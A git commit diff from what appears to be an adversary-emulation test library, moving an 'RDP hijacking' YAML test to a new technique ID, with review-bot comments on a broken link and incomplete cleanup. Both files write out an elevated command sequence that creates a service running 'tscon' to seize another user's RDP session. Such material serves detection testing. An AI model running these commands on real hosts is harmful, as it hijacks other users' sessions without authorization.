Moved Atomic for RDP Hijacking (#1199)

* Removing RDP Hijacking Atomic

Removing RDP Hijacking Atomic and moving to T1563.002-RDP Hijacking

* Create T1563.002.yaml

Moved from T1021.001
Tsora-Pop
2020-08-15 21:23:54 -05:00
committed by GitHub
parent 22a8e308ca
commit 6bd48533a3
2 changed files with 27 additions and 24 deletions
-24
@@ -1,30 +1,6 @@
attack_technique: T1021.001
display_name: 'Remote Services: Remote Desktop Protocol'
atomic_tests:
- name: RDP hijacking
auto_generated_guid: a37ac520-b911-458e-8aed-c5f1576d9f46
description: |
RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization
supported_platforms:
- windows
input_arguments:
Session_ID:
description: The ID of the session to which you want to connect
type: String
default: "1337"
Destination_ID:
description: Connect the session of another user to a different session
type: String
default: rdp-tcp#55
executor:
command: |
query user
sc.exe create sesshijack binpath= "cmd.exe /k tscon #{Session_ID} /dest:#{Destination_ID}"
net start sesshijack
cleanup_command: |
sc.exe delete sesshijack >nul 2>&1
name: command_prompt
elevation_required: true
- name: RDPto-DomainController
auto_generated_guid: 355d4632-8cb9-449d-91ce-b566d0253d3e
description: |
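Review bot: the `description` of the removed `RDP hijacking` test carries a malformed markdown link (`RDP hijacking](https://medium.com/...)` with no opening `[`); that is harmless in a block being deleted, but the same text reappears verbatim in the new T1563.002 file below, so the leading `[` should be added there. Note also that this hunk removes the only test with `auto_generated_guid: a37ac520-b911-458e-8aed-c5f1576d9f46` from T1021.001, so the new file must reuse that GUID for existing references to keep resolving (it does), and `RDPto-DomainController` correctly stays as the first remaining test here.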
+27
@@ -0,0 +1,27 @@
attack_technique: T1563.002
display_name: 'Remote Service Session Hijacking: RDP Hijacking'
atomic_tests:
- name: RDP hijacking
auto_generated_guid: a37ac520-b911-458e-8aed-c5f1576d9f46
description: |
RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization
supported_platforms:
- windows
input_arguments:
Session_ID:
description: The ID of the session to which you want to connect
type: String
default: "1337"
Destination_ID:
description: Connect the session of another user to a different session
type: String
default: rdp-tcp#55
executor:
command: |
query user
sc.exe create sesshijack binpath= "cmd.exe /k tscon #{Session_ID} /dest:#{Destination_ID}"
net start sesshijack
cleanup_command: |
sc.exe delete sesshijack >nul 2>&1
name: command_prompt
elevation_required: true
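Review bot: the `description` still has the broken link copied from the old file; change `RDP hijacking](https://medium.com/@networksecurity/...)` to `[RDP hijacking](https://medium.com/@networksecurity/...)` so the rendered atomic shows the reference as a link. Second, `cleanup_command` only runs `sc.exe delete sesshijack >nul 2>&1`, while `net start sesshijack` launches a `cmd.exe /k ...` that stays resident; add a `net stop sesshijack >nul 2>&1` (or equivalent) before the delete so cleanup does not leave the service or its spawned process behind on the test host. Finally, the `Session_ID` default `"1337"` and `Destination_ID` default `rdp-tcp#55` are placeholders that will not match a real session, so the description should state that the operator must supply values from the `query user` output for the test to exercise anything; keeping `auto_generated_guid: a37ac520-b911-458e-8aed-c5f1576d9f46` identical to the removed T1021.001 entry is correct for a move.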